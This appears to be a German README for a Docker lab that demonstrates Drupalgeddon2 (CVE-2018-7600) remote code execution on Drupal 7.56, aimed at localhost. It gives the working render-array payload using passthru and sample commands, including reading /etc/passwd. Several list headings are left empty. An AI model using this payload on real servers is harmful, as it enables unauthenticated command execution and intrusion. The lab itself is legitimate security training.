Bildungslabor, das CVE-2018-7600 (Drupalgeddon2) Remote Code Execution unter Verwendung einer Docker-basierten, verwundbaren Drupal 7.56-Umgebung demonstriert.
Bildungslabor, das die Ausnutzung von CVE-2018-7600 (Drupalgeddon2) unter Verwendung einer verwundbaren Drupal 7.56-Umgebung demonstriert, die mit Docker bereitgestellt wird.
Dieses Projekt simuliert einen realen Schwachstellenbewertungs-Workflow, einschließlich:
CVE-2018-7600 (Drupalgeddon2) ist eine kritische Remote-Code-Ausführungs-Schwachstelle (RCE) im Drupal-CMS.
Das Problem existiert in der Formular-API von Drupal, wo benutzergesteuerte Eingaben als Render-Arrays interpretiert werden können, was es Angreifern ermöglicht, bösartige Callbacks wie folgende zu injizieren:
Dies führt zu einer nicht authentifizierten Befehlsausführung auf dem Server.
Attacker (Kali Linux)
|
| HTTP Requests
v
Drupal 7.56 (Vulnerable)
|
v
MySQL Database
cve-2018-7600-drupalgeddon2-lab
│
├── README.md
├── setup.md
├── scan.py
├── exploit.py
│
├── lab-setup/
│ └── docker-compose.yml
│
├── screenshots/
│ ├── drupal-dashboard.png
│ ├── drupal-version.png
│ └── rce-output.png
│
├── logs/
│ ├── scan_results.txt
│ └── exploit_log.txt
│
├── payloads/
│ └── payload-list.txt
│
├── report/
│ └── drupalgeddon2-report.pdf


git clone https://github.com/Meraj1312/cve-2018-7600-drupalgeddon2-lab.git
cd cve-2018-7600-drupalgeddon2-lab
docker compose up -d
http://localhost:8080
python3 scan.py http://localhost:8080
Beispielausgabe:
[~] Scanning http://localhost:8080... VULNERABLE
python3 exploit.py http://localhost:8080 id
Beispielausgabe:
uid=33(www-data) gid=33(www-data)
Grundlegende verwendete Payload-Struktur:
name[#post_render][]=passthru
name[#type]=markup
name[#markup]=whoami
Beispielbefehle:
whoami
id
cat /etc/passwd
Vollständige Payload-Liste verfügbar unter:
payloads/payload-list.txt
Um eine saubere und professionelle Repository-Struktur zu erhalten:
Diese Trennung stellt sicher:
Dieses Labor ist gedacht für:
Dieses Projekt dient nur zu Bildungs- und Forschungszwecken.
Versuchen Sie nicht, Systeme ohne ausdrückliche Genehmigung auszunutzen.
Die Autoren sind nicht verantwortlich für Missbrauch.